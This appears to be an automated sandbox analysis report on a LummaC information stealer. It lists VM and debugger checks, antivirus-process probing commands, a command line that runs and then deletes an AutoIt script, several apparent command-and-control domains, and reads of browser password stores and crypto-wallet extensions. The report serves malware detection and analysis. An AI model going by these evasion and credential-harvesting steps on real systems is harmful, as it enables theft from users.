Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

API coverage: 5.3 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7628

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose,	35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose,	35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose,	35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B974F0 FindFirstFileW,FindClose,	35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F51BD FindFirstFileA,GetLastError,	35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	35_2_013F29E5

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_00B3310D

Source: Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000003.2221324344.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227714652.0000000001389000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2221324344.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*

Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_01403EA7 LdrInitializeThunk,

35_2_01403EA7

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B9F607 BlockInput,

35_2_00B9F607

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

35_2_00B32D33

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_00B3310D

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B44BF4 mov eax, dword ptr fs:[00000030h]	35_2_00B44BF4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01415AFE mov eax, dword ptr fs:[00000030h]	35_2_01415AFE
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h]	35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h]	35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h]	35_2_01409B91
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h]	35_2_01409B91
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_01403CA5 mov eax, dword ptr fs:[00000030h]	35_2_01403CA5

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B820BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

35_2_00B820BE

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B52446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_00B52446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B40E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_00B40E4D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B40F9F SetUnhandledExceptionFilter,	35_2_00B40F9F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00B411EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	35_2_00B411EE

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Memory protected: page readonly | page read and write | page guard | page no cache

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: seallysl.site

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

35_2_00B8230F

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

35_2_00B32D33

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B8C078 SendInput,keybd_event,

35_2_00B8C078

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00BA2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

35_2_00BA2E89

Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x	Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B81C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

35_2_00B81C68

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B82777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

35_2_00B82777

Source: Updater.exe, 0000001C.00000000.1715428534.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B40CA4 cpuid

35_2_00B40CA4

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	35_2_013F2BBD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: GetLocaleInfoA,GetACP,	35_2_013F90D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: GetLocaleInfoA,	35_2_013F34E1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: GetLocaleInfoA,	35_2_013F7B41
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: GetLocaleInfoA,	35_2_013F7B8D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	35_2_013F2CC7

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B98C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

35_2_00B98C58

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B659C7 GetUserNameW,

35_2_00B659C7

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B5B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

35_2_00B5B99F

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

35_2_00B3310D

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: find.exe, 00000013.00000002.1709477597.0000021154610000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1709402244.000002115444B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: avgui.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
